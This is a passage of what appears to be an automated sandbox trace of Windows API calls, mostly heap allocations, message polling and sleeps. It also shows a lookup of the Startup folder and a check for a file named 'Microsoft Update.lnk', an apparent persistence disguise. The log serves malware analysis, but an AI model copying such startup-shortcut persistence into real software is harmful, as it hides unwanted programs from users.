lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0247.422] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38665d0 [0247.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0247.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0247.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865b08 | out: hHeap=0x2af0000) returned 1 [0247.425] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0247.425] TranslateMessage (lpMsg=0x8cf708) returned 0 [0247.425] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0247.425] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0247.426] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0247.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0247.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0247.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0247.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0247.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0247.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0247.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0247.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0247.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0247.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0247.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0247.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0247.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0247.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0247.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0247.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38665d0 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0247.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0247.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0247.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0247.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0247.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0247.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0247.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0247.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0247.429] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0247.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0247.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0247.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0247.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0247.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0247.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0247.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0247.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0247.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0247.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0247.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0247.430] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0247.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0247.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0247.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab668 [0247.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0247.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0247.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab560 [0247.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0247.430] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0247.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0247.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0247.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0247.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0247.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0247.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0247.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0247.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0247.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0247.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0247.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0247.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0247.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0247.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0247.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0247.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0247.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0247.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0247.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0247.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0247.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0247.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0247.480] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0247.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0247.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0247.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0247.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0247.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0247.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0247.505] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0247.505] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0247.505] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.506] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0247.506] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0247.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0247.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0247.507] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0247.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0247.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0247.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0247.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0247.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0247.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0247.508] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0247.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0247.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0247.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0247.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0247.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0247.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0247.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0247.508] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0247.508] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0247.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0247.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0247.509] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0247.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0247.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0247.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5c0 [0247.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0247.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0247.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0247.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0247.509] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0247.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0247.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eac38 [0247.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0247.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0247.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0247.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0247.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0247.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0247.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0247.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0247.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0247.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0247.509] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0247.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0247.509] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0247.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0247.510] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0247.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eac38 | out: hHeap=0x2af0000) returned 1 [0247.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0247.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0247.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0247.510] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0247.510] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0247.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0247.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0247.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0247.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0247.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0247.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0247.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0247.577] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0247.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0247.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0247.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0247.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0247.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0247.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0247.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0247.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0247.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0247.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0247.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0247.581] timeGetTime () returned 0x117dc79 [0247.581] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.581] Sleep (dwMilliseconds=0xa) [0247.620] timeGetTime () returned 0x117dca8 [0247.620] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.620] Sleep (dwMilliseconds=0xa) [0247.656] timeGetTime () returned 0x117dcc8 [0247.656] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.656] Sleep (dwMilliseconds=0xa) [0247.683] timeGetTime () returned 0x117dce7 [0247.683] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.683] Sleep (dwMilliseconds=0xa) [0247.727] timeGetTime () returned 0x117dd07 [0247.727] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.727] Sleep (dwMilliseconds=0xa) [0247.745] timeGetTime () returned 0x117dd25 [0247.745] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.745] Sleep (dwMilliseconds=0xa) [0247.760] timeGetTime () returned 0x117dd35 [0247.760] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.760] Sleep (dwMilliseconds=0xa) [0247.776] timeGetTime () returned 0x117dd45 [0247.776] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.776] Sleep (dwMilliseconds=0xa) [0247.792] timeGetTime () returned 0x117dd54 [0247.792] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.792] Sleep (dwMilliseconds=0xa) [0247.810] timeGetTime () returned 0x117dd64 [0247.810] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.810] Sleep (dwMilliseconds=0xa) [0247.823] timeGetTime () returned 0x117dd74 [0247.823] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.823] Sleep (dwMilliseconds=0xa) [0247.853] timeGetTime () returned 0x117dd83 [0247.853] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.853] Sleep (dwMilliseconds=0xa) [0247.870] timeGetTime () returned 0x117dda2 [0247.870] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.870] Sleep (dwMilliseconds=0xa) [0247.885] timeGetTime () returned 0x117ddb2 [0247.885] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.885] Sleep (dwMilliseconds=0xa) [0247.901] timeGetTime () returned 0x117ddc2 [0247.901] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, 